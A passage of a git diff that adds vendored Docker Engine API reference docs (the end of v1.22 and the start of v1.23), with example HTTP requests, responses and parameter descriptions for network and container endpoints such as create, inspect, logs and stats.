"com.docker.network.bridge.name": "docker0", + "com.docker.network.driver.mtu": "1500" + } +} +``` + +**Status codes**: + +- **200** - no error +- **404** - network not found + +#### Create a network + +`POST /networks/create` + +Create a network + +**Example request**: + +``` +POST /v1.22/networks/create HTTP/1.1 +Content-Type: application/json + +{ + "Name":"isolated_nw", + "CheckDuplicate":true, + "Driver":"bridge", + "IPAM":{ + "Driver": "default", + "Config":[ + { + "Subnet":"172.20.0.0/16", + "IPRange":"172.20.10.0/24", + "Gateway":"172.20.10.11" + }, + { + "Subnet":"2001:db8:abcd::/64", + "Gateway":"2001:db8:abcd::1011" + } + ], + "Options": { + "foo": "bar" + } + }, + "Internal":true +} +``` + +**Example response**: + +``` +HTTP/1.1 201 Created +Content-Type: application/json + +{ + "Id": "22be93d5babb089c5aab8dbc369042fad48ff791584ca2da2100db837a1c7c30", + "Warning": "" +} +``` + +**Status codes**: + +- **201** - no error +- **404** - plugin not found +- **500** - server error + +**JSON parameters**: + +- **Name** - The new network's name. this is a mandatory field +- **CheckDuplicate** - Requests daemon to check for networks with same name. Defaults to `false` +- **Driver** - Name of the network driver plugin to use. Defaults to `bridge` driver +- **IPAM** - Optional custom IP scheme for the network + - **Driver** - Name of the IPAM driver to use. 
Defaults to `default` driver + - **Config** - List of IPAM configuration options, specified as a map: + `{"Subnet": , "IPRange": , "Gateway": , "AuxAddress": }` + - **Options** - Driver-specific options, specified as a map: `{"option":"value" [,"option2":"value2"]}` +- **Options** - Network specific options to be used by the drivers + +#### Connect a container to a network + +`POST /networks/(id)/connect` + +Connect a container to a network + +**Example request**: + +``` +POST /v1.22/networks/22be93d5babb089c5aab8dbc369042fad48ff791584ca2da2100db837a1c7c30/connect HTTP/1.1 +Content-Type: application/json + +{ + "Container":"3613f73ba0e4", + "EndpointConfig": { + "IPAMConfig": { + "IPv4Address":"172.24.56.89", + "IPv6Address":"2001:db8::5689" + } + } +} +``` + +**Example response**: + + HTTP/1.1 200 OK + +**Status codes**: + +- **200** - no error +- **404** - network or container is not found +- **500** - Internal Server Error + +**JSON parameters**: + +- **container** - container-id/name to be connected to the network + +#### Disconnect a container from a network + +`POST /networks/(id)/disconnect` + +Disconnect a container from a network + +**Example request**: + +``` +POST /v1.22/networks/22be93d5babb089c5aab8dbc369042fad48ff791584ca2da2100db837a1c7c30/disconnect HTTP/1.1 +Content-Type: application/json + +{ + "Container":"3613f73ba0e4", + "Force":false +} +``` + +**Example response**: + + HTTP/1.1 200 OK + +**Status codes**: + +- **200** - no error +- **404** - network or container not found +- **500** - Internal Server Error + +**JSON parameters**: + +- **Container** - container-id/name to be disconnected from a network +- **Force** - Force the container to disconnect from a network + +#### Remove a network + +`DELETE /networks/(id)` + +Instruct the driver to remove the network (`id`). 
+ +**Example request**: + + DELETE /v1.22/networks/22be93d5babb089c5aab8dbc369042fad48ff791584ca2da2100db837a1c7c30 HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + +**Status codes**: + +- **200** - no error +- **404** - no such network +- **500** - server error + +## 3. Going further + +### 3.1 Inside `docker run` + +As an example, the `docker run` command line makes the following API calls: + +- Create the container + +- If the status code is 404, it means the image doesn't exist: + - Try to pull it. + - Then, retry to create the container. + +- Start the container. + +- If you are not in detached mode: +- Attach to the container, using `logs=1` (to have `stdout` and + `stderr` from the container's start) and `stream=1` + +- If in detached mode or only `stdin` is attached, display the container's id. + +### 3.2 Hijacking + +In this version of the API, `/attach`, uses hijacking to transport `stdin`, +`stdout`, and `stderr` on the same socket. + +To hint potential proxies about connection hijacking, Docker client sends +connection upgrade headers similarly to websocket. + + Upgrade: tcp + Connection: Upgrade + +When Docker daemon detects the `Upgrade` header, it switches its status code +from **200 OK** to **101 UPGRADED** and resends the same headers. + + +### 3.3 CORS Requests + +To set cross origin requests to the Engine API please give values to +`--api-cors-header` when running Docker in daemon mode. 
Setting `*` (asterisk) allows all origins; +leaving it at the default (blank) means CORS is disabled. + + $ dockerd -H="192.168.1.9:2375" --api-cors-header="http://foo.bar" diff --git a/vendor/github.com/docker/docker/docs/api/v1.23.md b/vendor/github.com/docker/docker/docs/api/v1.23.md new file mode 100644 index 0000000000..e23811bb95 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/api/v1.23.md @@ -0,0 +1,3424 @@ +--- +title: "Engine API v1.23" +description: "API Documentation for Docker" +keywords: "API, Docker, rcli, REST, documentation" +redirect_from: +- /engine/reference/api/docker_remote_api_v1.23/ +- /reference/api/docker_remote_api_v1.23/ +--- + + + +## 1. Brief introduction + + - The daemon listens on `unix:///var/run/docker.sock` but you can + [Bind Docker to another host/port or a Unix socket](../reference/commandline/dockerd.md#bind-docker-to-another-host-port-or-a-unix-socket). + - The API tends to be REST. However, for some complex commands, like `attach` + or `pull`, the HTTP connection is hijacked to transport `stdout`, + `stdin` and `stderr`. + - When the client API version is newer than the daemon's, these calls return an HTTP + `400 Bad Request` error message. + +## 2. 
Endpoints + +### 2.1 Containers + +#### List containers + +`GET /containers/json` + +List containers + +**Example request**: + + GET /v1.23/containers/json?all=1&before=8dfafdbc3a40&size=1 HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "Id": "8dfafdbc3a40", + "Names":["/boring_feynman"], + "Image": "ubuntu:latest", + "ImageID": "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82", + "Command": "echo 1", + "Created": 1367854155, + "State": "Exited", + "Status": "Exit 0", + "Ports": [{"PrivatePort": 2222, "PublicPort": 3333, "Type": "tcp"}], + "Labels": { + "com.example.vendor": "Acme", + "com.example.license": "GPL", + "com.example.version": "1.0" + }, + "SizeRw": 12288, + "SizeRootFs": 0, + "HostConfig": { + "NetworkMode": "default" + }, + "NetworkSettings": { + "Networks": { + "bridge": { + "IPAMConfig": null, + "Links": null, + "Aliases": null, + "NetworkID": "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812", + "EndpointID": "2cdc4edb1ded3631c81f57966563e5c8525b81121bb3706a9a9a3ae102711f3f", + "Gateway": "172.17.0.1", + "IPAddress": "172.17.0.2", + "IPPrefixLen": 16, + "IPv6Gateway": "", + "GlobalIPv6Address": "", + "GlobalIPv6PrefixLen": 0, + "MacAddress": "02:42:ac:11:00:02" + } + } + }, + "Mounts": [ + { + "Name": "fac362...80535", + "Source": "/data", + "Destination": "/data", + "Driver": "local", + "Mode": "ro,Z", + "RW": false, + "Propagation": "" + } + ] + }, + { + "Id": "9cd87474be90", + "Names":["/coolName"], + "Image": "ubuntu:latest", + "ImageID": "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82", + "Command": "echo 222222", + "Created": 1367854155, + "State": "Exited", + "Status": "Exit 0", + "Ports": [], + "Labels": {}, + "SizeRw": 12288, + "SizeRootFs": 0, + "HostConfig": { + "NetworkMode": "default" + }, + "NetworkSettings": { + "Networks": { + "bridge": { + "IPAMConfig": null, + "Links": null, + "Aliases": null, + "NetworkID": 
"7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812", + "EndpointID": "88eaed7b37b38c2a3f0c4bc796494fdf51b270c2d22656412a2ca5d559a64d7a", + "Gateway": "172.17.0.1", + "IPAddress": "172.17.0.8", + "IPPrefixLen": 16, + "IPv6Gateway": "", + "GlobalIPv6Address": "", + "GlobalIPv6PrefixLen": 0, + "MacAddress": "02:42:ac:11:00:08" + } + } + }, + "Mounts": [] + }, + { + "Id": "3176a2479c92", + "Names":["/sleepy_dog"], + "Image": "ubuntu:latest", + "ImageID": "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82", + "Command": "echo 3333333333333333", + "Created": 1367854154, + "State": "Exited", + "Status": "Exit 0", + "Ports":[], + "Labels": {}, + "SizeRw":12288, + "SizeRootFs":0, + "HostConfig": { + "NetworkMode": "default" + }, + "NetworkSettings": { + "Networks": { + "bridge": { + "IPAMConfig": null, + "Links": null, + "Aliases": null, + "NetworkID": "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812", + "EndpointID": "8b27c041c30326d59cd6e6f510d4f8d1d570a228466f956edf7815508f78e30d", + "Gateway": "172.17.0.1", + "IPAddress": "172.17.0.6", + "IPPrefixLen": 16, + "IPv6Gateway": "", + "GlobalIPv6Address": "", + "GlobalIPv6PrefixLen": 0, + "MacAddress": "02:42:ac:11:00:06" + } + } + }, + "Mounts": [] + }, + { + "Id": "4cb07b47f9fb", + "Names":["/running_cat"], + "Image": "ubuntu:latest", + "ImageID": "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82", + "Command": "echo 444444444444444444444444444444444", + "Created": 1367854152, + "State": "Exited", + "Status": "Exit 0", + "Ports": [], + "Labels": {}, + "SizeRw": 12288, + "SizeRootFs": 0, + "HostConfig": { + "NetworkMode": "default" + }, + "NetworkSettings": { + "Networks": { + "bridge": { + "IPAMConfig": null, + "Links": null, + "Aliases": null, + "NetworkID": "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812", + "EndpointID": "d91c7b2f0644403d7ef3095985ea0e2370325cd2332ff3a3225c4247328e66e9", + "Gateway": "172.17.0.1", + "IPAddress": 
"172.17.0.5", + "IPPrefixLen": 16, + "IPv6Gateway": "", + "GlobalIPv6Address": "", + "GlobalIPv6PrefixLen": 0, + "MacAddress": "02:42:ac:11:00:05" + } + } + }, + "Mounts": [] + } + ] + +**Query parameters**: + +- **all** – 1/True/true or 0/False/false, Show all containers. + Only running containers are shown by default (i.e., this defaults to false) +- **limit** – Show `limit` last created + containers, include non-running ones. +- **since** – Show only containers created since Id, include + non-running ones. +- **before** – Show only containers created before Id, include + non-running ones. +- **size** – 1/True/true or 0/False/false, Show the containers + sizes +- **filters** - a JSON encoded value of the filters (a `map[string][]string`) to process on the containers list. Available filters: + - `exited=`; -- containers with exit code of `` ; + - `status=`(`created`|`restarting`|`running`|`paused`|`exited`|`dead`) + - `label=key` or `label="key=value"` of a container label + - `isolation=`(`default`|`process`|`hyperv`) (Windows daemon only) + - `ancestor`=(`[:]`, `` or ``) + - `before`=(`` or ``) + - `since`=(`` or ``) + - `volume`=(`` or ``) + +**Status codes**: + +- **200** – no error +- **400** – bad parameter +- **500** – server error + +#### Create a container + +`POST /containers/create` + +Create a container + +**Example request**: + + POST /v1.23/containers/create HTTP/1.1 + Content-Type: application/json + + { + "Hostname": "", + "Domainname": "", + "User": "", + "AttachStdin": false, + "AttachStdout": true, + "AttachStderr": true, + "Tty": false, + "OpenStdin": false, + "StdinOnce": false, + "Env": [ + "FOO=bar", + "BAZ=quux" + ], + "Cmd": [ + "date" + ], + "Entrypoint": "", + "Image": "ubuntu", + "Labels": { + "com.example.vendor": "Acme", + "com.example.license": "GPL", + "com.example.version": "1.0" + }, + "Volumes": { + "/volumes/data": {} + }, + "WorkingDir": "", + "NetworkDisabled": false, + "MacAddress": "12:34:56:78:9a:bc", + "ExposedPorts": { + 
"22/tcp": {} + }, + "StopSignal": "SIGTERM", + "HostConfig": { + "Binds": ["/tmp:/tmp"], + "Tmpfs": { "/run": "rw,noexec,nosuid,size=65536k" }, + "Links": ["redis3:redis"], + "Memory": 0, + "MemorySwap": 0, + "MemoryReservation": 0, + "KernelMemory": 0, + "CpuShares": 512, + "CpuPeriod": 100000, + "CpuQuota": 50000, + "CpusetCpus": "0,1", + "CpusetMems": "0,1", + "BlkioWeight": 300, + "BlkioWeightDevice": [{}], + "BlkioDeviceReadBps": [{}], + "BlkioDeviceReadIOps": [{}], + "BlkioDeviceWriteBps": [{}], + "BlkioDeviceWriteIOps": [{}], + "MemorySwappiness": 60, + "OomKillDisable": false, + "OomScoreAdj": 500, + "PidMode": "", + "PidsLimit": -1, + "PortBindings": { "22/tcp": [{ "HostPort": "11022" }] }, + "PublishAllPorts": false, + "Privileged": false, + "ReadonlyRootfs": false, + "Dns": ["8.8.8.8"], + "DnsOptions": [""], + "DnsSearch": [""], + "ExtraHosts": null, + "VolumesFrom": ["parent", "other:ro"], + "CapAdd": ["NET_ADMIN"], + "CapDrop": ["MKNOD"], + "GroupAdd": ["newgroup"], + "RestartPolicy": { "Name": "", "MaximumRetryCount": 0 }, + "NetworkMode": "bridge", + "Devices": [], + "Ulimits": [{}], + "LogConfig": { "Type": "json-file", "Config": {} }, + "SecurityOpt": [], + "CgroupParent": "", + "VolumeDriver": "", + "ShmSize": 67108864 + }, + "NetworkingConfig": { + "EndpointsConfig": { + "isolated_nw" : { + "IPAMConfig": { + "IPv4Address":"172.20.30.33", + "IPv6Address":"2001:db8:abcd::3033" + }, + "Links":["container_1", "container_2"], + "Aliases":["server_x", "server_y"] + } + } + } + } + +**Example response**: + + HTTP/1.1 201 Created + Content-Type: application/json + + { + "Id":"e90e34656806", + "Warnings":[] + } + +**JSON parameters**: + +- **Hostname** - A string value containing the hostname to use for the + container. +- **Domainname** - A string value containing the domain name to use + for the container. +- **User** - A string value specifying the user inside the container. +- **AttachStdin** - Boolean value, attaches to `stdin`. 
+- **AttachStdout** - Boolean value, attaches to `stdout`. +- **AttachStderr** - Boolean value, attaches to `stderr`. +- **Tty** - Boolean value, Attach standard streams to a `tty`, including `stdin` if it is not closed. +- **OpenStdin** - Boolean value, opens `stdin`, +- **StdinOnce** - Boolean value, close `stdin` after the 1 attached client disconnects. +- **Env** - A list of environment variables in the form of `["VAR=value", ...]` +- **Labels** - Adds a map of labels to a container. To specify a map: `{"key":"value", ... }` +- **Cmd** - Command to run specified as a string or an array of strings. +- **Entrypoint** - Set the entry point for the container as a string or an array + of strings. +- **Image** - A string specifying the image name to use for the container. +- **Volumes** - An object mapping mount point paths (strings) inside the + container to empty objects. +- **WorkingDir** - A string specifying the working directory for commands to + run in. +- **NetworkDisabled** - Boolean value, when true disables networking for the + container +- **ExposedPorts** - An object mapping ports to an empty object in the form of: + `"ExposedPorts": { "/: {}" }` +- **StopSignal** - Signal to stop a container as a string or unsigned integer. `SIGTERM` by default. +- **HostConfig** + - **Binds** – A list of volume bindings for this container. Each volume binding is a string in one of these forms: + + `host-src:container-dest` to bind-mount a host path into the + container. Both `host-src`, and `container-dest` must be an + _absolute_ path. + + `host-src:container-dest:ro` to make the bind-mount read-only + inside the container. Both `host-src`, and `container-dest` must be + an _absolute_ path. + + `volume-name:container-dest` to bind-mount a volume managed by a + volume driver into the container. `container-dest` must be an + _absolute_ path. + + `volume-name:container-dest:ro` to mount the volume read-only + inside the container. 
`container-dest` must be an _absolute_ path. + - **Tmpfs** – A map of container directories which should be replaced by tmpfs mounts, and their corresponding + mount options. A JSON object in the form `{ "/run": "rw,noexec,nosuid,size=65536k" }`. + - **Links** - A list of links for the container. Each link entry should be + in the form of `container_name:alias`. + - **Memory** - Memory limit in bytes. + - **MemorySwap** - Total memory limit (memory + swap); set `-1` to enable unlimited swap. + You must use this with `memory` and make the swap value larger than `memory`. + - **MemoryReservation** - Memory soft limit in bytes. + - **KernelMemory** - Kernel memory limit in bytes. + - **CpuShares** - An integer value containing the container's CPU Shares + (ie. the relative weight vs other containers). + - **CpuPeriod** - The length of a CPU period in microseconds. + - **CpuQuota** - Microseconds of CPU time that the container can get in a CPU period. + - **CpusetCpus** - String value containing the `cgroups CpusetCpus` to use. + - **CpusetMems** - Memory nodes (MEMs) in which to allow execution (0-3, 0,1). Only effective on NUMA systems. + - **BlkioWeight** - Block IO weight (relative weight) accepts a weight value between 10 and 1000. 
+ - **BlkioWeightDevice** - Block IO weight (relative device weight) in the form of: `"BlkioWeightDevice": [{"Path": "device_path", "Weight": weight}]` + - **BlkioDeviceReadBps** - Limit read rate (bytes per second) from a device in the form of: `"BlkioDeviceReadBps": [{"Path": "device_path", "Rate": rate}]`, for example: + `"BlkioDeviceReadBps": [{"Path": "/dev/sda", "Rate": "1024"}]` + - **BlkioDeviceWriteBps** - Limit write rate (bytes per second) to a device in the form of: `"BlkioDeviceWriteBps": [{"Path": "device_path", "Rate": rate}]`, for example: + `"BlkioDeviceWriteBps": [{"Path": "/dev/sda", "Rate": "1024"}]` + - **BlkioDeviceReadIOps** - Limit read rate (IO per second) from a device in the form of: `"BlkioDeviceReadIOps": [{"Path": "device_path", "Rate": rate}]`, for example: + `"BlkioDeviceReadIOps": [{"Path": "/dev/sda", "Rate": "1000"}]` + - **BlkioDeviceWriteIOps** - Limit write rate (IO per second) to a device in the form of: `"BlkioDeviceWriteIOps": [{"Path": "device_path", "Rate": rate}]`, for example: + `"BlkioDeviceWriteIOps": [{"Path": "/dev/sda", "Rate": "1000"}]` + - **MemorySwappiness** - Tune a container's memory swappiness behavior. Accepts an integer between 0 and 100. + - **OomKillDisable** - Boolean value, whether to disable OOM Killer for the container or not. + - **OomScoreAdj** - An integer value containing the score given to the container in order to tune OOM killer preferences. + - **PidMode** - Set the PID (Process) Namespace mode for the container; + `"container:"`: joins another container's PID namespace + `"host"`: use the host's PID namespace inside the container + - **PidsLimit** - Tune a container's pids limit. Set -1 for unlimited. + - **PortBindings** - A map of exposed container ports and the host port they + should map to. A JSON object in the form + `{ /: [{ "HostPort": "" }] }` + Take note that `port` is specified as a string and not an integer value. 
+ - **PublishAllPorts** - Allocates a random host port for all of a container's + exposed ports. Specified as a boolean value. + - **Privileged** - Gives the container full access to the host. Specified as + a boolean value. + - **ReadonlyRootfs** - Mount the container's root filesystem as read only. + Specified as a boolean value. + - **Dns** - A list of DNS servers for the container to use. + - **DnsOptions** - A list of DNS options + - **DnsSearch** - A list of DNS search domains + - **ExtraHosts** - A list of hostnames/IP mappings to add to the + container's `/etc/hosts` file. Specified in the form `["hostname:IP"]`. + - **VolumesFrom** - A list of volumes to inherit from another container. + Specified in the form `[:]` + - **CapAdd** - A list of kernel capabilities to add to the container. + - **CapDrop** - A list of kernel capabilities to drop from the container. + - **GroupAdd** - A list of additional groups that the container process will run as + - **RestartPolicy** – The behavior to apply when the container exits. The + value is an object with a `Name` property of either `"always"` to + always restart, `"unless-stopped"` to restart always except when + user has manually stopped the container or `"on-failure"` to restart only when the container + exit code is non-zero. If `on-failure` is used, `MaximumRetryCount` + controls the number of times to retry before giving up. + The default is not to restart. (optional) + An ever-increasing delay (double the previous delay, starting at 100 ms) + is added before each restart to prevent flooding the server. + - **UsernsMode** - Sets the user namespace mode for the container when user namespace remapping option is enabled. + Supported values are: `host`. + - **NetworkMode** - Sets the networking mode for the container. Supported + standard values are: `bridge`, `host`, `none`, and `container:`. Any other value is taken + as a custom network's name to which this container should connect. 
+ - **Devices** - A list of devices to add to the container specified as a JSON object in the + form + `{ "PathOnHost": "/dev/deviceName", "PathInContainer": "/dev/deviceName", "CgroupPermissions": "mrw"}` + - **Ulimits** - A list of ulimits to set in the container, specified as + `{ "Name": , "Soft": , "Hard": }`, for example: + `Ulimits: { "Name": "nofile", "Soft": 1024, "Hard": 2048 }` + - **SecurityOpt**: A list of string values to customize labels for MLS + systems, such as SELinux. + - **LogConfig** - Log configuration for the container, specified as a JSON object in the form + `{ "Type": "", "Config": {"key1": "val1"}}`. + Available types: `json-file`, `syslog`, `journald`, `gelf`, `fluentd`, `awslogs`, `splunk`, `etwlogs`, `none`. + The default is the `json-file` logging driver. + - **CgroupParent** - Path to `cgroups` under which the container's `cgroup` is created. If the path is not absolute, the path is considered to be relative to the `cgroups` path of the init process. Cgroups are created if they do not already exist. + - **VolumeDriver** - Driver that this container uses to mount volumes. + - **ShmSize** - Size of `/dev/shm` in bytes. The size must be greater than 0. If omitted the system uses 64MB. + +**Query parameters**: + +- **name** – Assign the specified name to the container. Must + match `/?[a-zA-Z0-9_-]+`. 
+ +**Status codes**: + +- **201** – no error +- **400** – bad parameter +- **404** – no such container +- **406** – impossible to attach (container not running) +- **409** – conflict +- **500** – server error + +#### Inspect a container + +`GET /containers/(id or name)/json` + +Return low-level information on the container `id` + +**Example request**: + + GET /v1.23/containers/4fa6e0f0c678/json HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "AppArmorProfile": "", + "Args": [ + "-c", + "exit 9" + ], + "Config": { + "AttachStderr": true, + "AttachStdin": false, + "AttachStdout": true, + "Cmd": [ + "/bin/sh", + "-c", + "exit 9" + ], + "Domainname": "", + "Entrypoint": null, + "Env": [ + "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" + ], + "ExposedPorts": null, + "Hostname": "ba033ac44011", + "Image": "ubuntu", + "Labels": { + "com.example.vendor": "Acme", + "com.example.license": "GPL", + "com.example.version": "1.0" + }, + "MacAddress": "", + "NetworkDisabled": false, + "OnBuild": null, + "OpenStdin": false, + "StdinOnce": false, + "Tty": false, + "User": "", + "Volumes": { + "/volumes/data": {} + }, + "WorkingDir": "", + "StopSignal": "SIGTERM" + }, + "Created": "2015-01-06T15:47:31.485331387Z", + "Driver": "devicemapper", + "ExecIDs": null, + "HostConfig": { + "Binds": null, + "BlkioWeight": 0, + "BlkioWeightDevice": [{}], + "BlkioDeviceReadBps": [{}], + "BlkioDeviceWriteBps": [{}], + "BlkioDeviceReadIOps": [{}], + "BlkioDeviceWriteIOps": [{}], + "CapAdd": null, + "CapDrop": null, + "ContainerIDFile": "", + "CpusetCpus": "", + "CpusetMems": "", + "CpuShares": 0, + "CpuPeriod": 100000, + "Devices": [], + "Dns": null, + "DnsOptions": null, + "DnsSearch": null, + "ExtraHosts": null, + "IpcMode": "", + "Links": null, + "LxcConf": [], + "Memory": 0, + "MemorySwap": 0, + "MemoryReservation": 0, + "KernelMemory": 0, + "OomKillDisable": false, + "OomScoreAdj": 500, + "NetworkMode": "bridge", + "PidMode": 
"", + "PortBindings": {}, + "Privileged": false, + "ReadonlyRootfs": false, + "PublishAllPorts": false, + "RestartPolicy": { + "MaximumRetryCount": 2, + "Name": "on-failure" + }, + "LogConfig": { + "Config": null, + "Type": "json-file" + }, + "SecurityOpt": null, + "VolumesFrom": null, + "Ulimits": [{}], + "VolumeDriver": "", + "ShmSize": 67108864 + }, + "HostnamePath": "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/hostname", + "HostsPath": "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/hosts", + "LogPath": "/var/lib/docker/containers/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b-json.log", + "Id": "ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39", + "Image": "04c5d3b7b0656168630d3ba35d8889bd0e9caafcaeb3004d2bfbc47e7c5d35d2", + "MountLabel": "", + "Name": "/boring_euclid", + "NetworkSettings": { + "Bridge": "", + "SandboxID": "", + "HairpinMode": false, + "LinkLocalIPv6Address": "", + "LinkLocalIPv6PrefixLen": 0, + "Ports": null, + "SandboxKey": "", + "SecondaryIPAddresses": null, + "SecondaryIPv6Addresses": null, + "EndpointID": "", + "Gateway": "", + "GlobalIPv6Address": "", + "GlobalIPv6PrefixLen": 0, + "IPAddress": "", + "IPPrefixLen": 0, + "IPv6Gateway": "", + "MacAddress": "", + "Networks": { + "bridge": { + "NetworkID": "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812", + "EndpointID": "7587b82f0dada3656fda26588aee72630c6fab1536d36e394b2bfbcf898c971d", + "Gateway": "172.17.0.1", + "IPAddress": "172.17.0.2", + "IPPrefixLen": 16, + "IPv6Gateway": "", + "GlobalIPv6Address": "", + "GlobalIPv6PrefixLen": 0, + "MacAddress": "02:42:ac:12:00:02" + } + } + }, + "Path": "/bin/sh", + "ProcessLabel": "", + "ResolvConfPath": "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/resolv.conf", + "RestartCount": 1, + "State": { 
+ "Error": "", + "ExitCode": 9, + "FinishedAt": "2015-01-06T15:47:32.080254511Z", + "OOMKilled": false, + "Dead": false, + "Paused": false, + "Pid": 0, + "Restarting": false, + "Running": true, + "StartedAt": "2015-01-06T15:47:32.072697474Z", + "Status": "running" + }, + "Mounts": [ + { + "Name": "fac362...80535", + "Source": "/data", + "Destination": "/data", + "Driver": "local", + "Mode": "ro,Z", + "RW": false, + "Propagation": "" + } + ] + } + +**Example request, with size information**: + + GET /v1.23/containers/4fa6e0f0c678/json?size=1 HTTP/1.1 + +**Example response, with size information**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + .... + "SizeRw": 0, + "SizeRootFs": 972, + .... + } + +**Query parameters**: + +- **size** – 1/True/true or 0/False/false, return container size information. Default is `false`. + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### List processes running inside a container + +`GET /containers/(id or name)/top` + +List processes running inside the container `id`. On Unix systems this +is done by running the `ps` command. This endpoint is not +supported on Windows. 
+ +**Example request**: + + GET /v1.23/containers/4fa6e0f0c678/top HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Titles" : [ + "UID", "PID", "PPID", "C", "STIME", "TTY", "TIME", "CMD" + ], + "Processes" : [ + [ + "root", "13642", "882", "0", "17:03", "pts/0", "00:00:00", "/bin/bash" + ], + [ + "root", "13735", "13642", "0", "17:06", "pts/0", "00:00:00", "sleep 10" + ] + ] + } + +**Example request**: + + GET /v1.23/containers/4fa6e0f0c678/top?ps_args=aux HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Titles" : [ + "USER","PID","%CPU","%MEM","VSZ","RSS","TTY","STAT","START","TIME","COMMAND" + ] + "Processes" : [ + [ + "root","13642","0.0","0.1","18172","3184","pts/0","Ss","17:03","0:00","/bin/bash" + ], + [ + "root","13895","0.0","0.0","4348","692","pts/0","S+","17:15","0:00","sleep 10" + ] + ], + } + +**Query parameters**: + +- **ps_args** – `ps` arguments to use (e.g., `aux`), defaults to `-ef` + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Get container logs + +`GET /containers/(id or name)/logs` + +Get `stdout` and `stderr` logs from the container ``id`` + +> **Note**: +> This endpoint works only for containers with the `json-file` or `journald` logging drivers. + +**Example request**: + + GET /v1.23/containers/4fa6e0f0c678/logs?stderr=1&stdout=1×tamps=1&follow=1&tail=10&since=1428990821 HTTP/1.1 + +**Example response**: + + HTTP/1.1 101 UPGRADED + Content-Type: application/vnd.docker.raw-stream + Connection: Upgrade + Upgrade: tcp + + {% raw %} + {{ STREAM }} + {% endraw %} + +**Query parameters**: + +- **follow** – 1/True/true or 0/False/false, return stream. Default `false`. +- **stdout** – 1/True/true or 0/False/false, show `stdout` log. Default `false`. +- **stderr** – 1/True/true or 0/False/false, show `stderr` log. Default `false`. +- **since** – UNIX timestamp (integer) to filter logs. 
Specifying a timestamp + will only output log-entries since that timestamp. Default: 0 (unfiltered) +- **timestamps** – 1/True/true or 0/False/false, print timestamps for + every log line. Default `false`. +- **tail** – Output specified number of lines at the end of logs: `all` or ``. Default all. + +**Status codes**: + +- **101** – no error, hints proxy about hijacking +- **200** – no error, no upgrade header found +- **404** – no such container +- **500** – server error + +#### Inspect changes on a container's filesystem + +`GET /containers/(id or name)/changes` + +Inspect changes on container `id`'s filesystem + +**Example request**: + + GET /v1.23/containers/4fa6e0f0c678/changes HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "Path": "/dev", + "Kind": 0 + }, + { + "Path": "/dev/kmsg", + "Kind": 1 + }, + { + "Path": "/test", + "Kind": 1 + } + ] + +Values for `Kind`: + +- `0`: Modify +- `1`: Add +- `2`: Delete + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Export a container + +`GET /containers/(id or name)/export` + +Export the contents of container `id` + +**Example request**: + + GET /v1.23/containers/4fa6e0f0c678/export HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/octet-stream + + {% raw %} + {{ TAR STREAM }} + {% endraw %} + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Get container stats based on resource usage + +`GET /containers/(id or name)/stats` + +This endpoint returns a live stream of a container's resource usage statistics. 
+ +**Example request**: + + GET /v1.23/containers/redis1/stats HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "read" : "2015-01-08T22:57:31.547920715Z", + "pids_stats": { + "current": 3 + }, + "networks": { + "eth0": { + "rx_bytes": 5338, + "rx_dropped": 0, + "rx_errors": 0, + "rx_packets": 36, + "tx_bytes": 648, + "tx_dropped": 0, + "tx_errors": 0, + "tx_packets": 8 + }, + "eth5": { + "rx_bytes": 4641, + "rx_dropped": 0, + "rx_errors": 0, + "rx_packets": 26, + "tx_bytes": 690, + "tx_dropped": 0, + "tx_errors": 0, + "tx_packets": 9 + } + }, + "memory_stats" : { + "stats" : { + "total_pgmajfault" : 0, + "cache" : 0, + "mapped_file" : 0, + "total_inactive_file" : 0, + "pgpgout" : 414, + "rss" : 6537216, + "total_mapped_file" : 0, + "writeback" : 0, + "unevictable" : 0, + "pgpgin" : 477, + "total_unevictable" : 0, + "pgmajfault" : 0, + "total_rss" : 6537216, + "total_rss_huge" : 6291456, + "total_writeback" : 0, + "total_inactive_anon" : 0, + "rss_huge" : 6291456, + "hierarchical_memory_limit" : 67108864, + "total_pgfault" : 964, + "total_active_file" : 0, + "active_anon" : 6537216, + "total_active_anon" : 6537216, + "total_pgpgout" : 414, + "total_cache" : 0, + "inactive_anon" : 0, + "active_file" : 0, + "pgfault" : 964, + "inactive_file" : 0, + "total_pgpgin" : 477 + }, + "max_usage" : 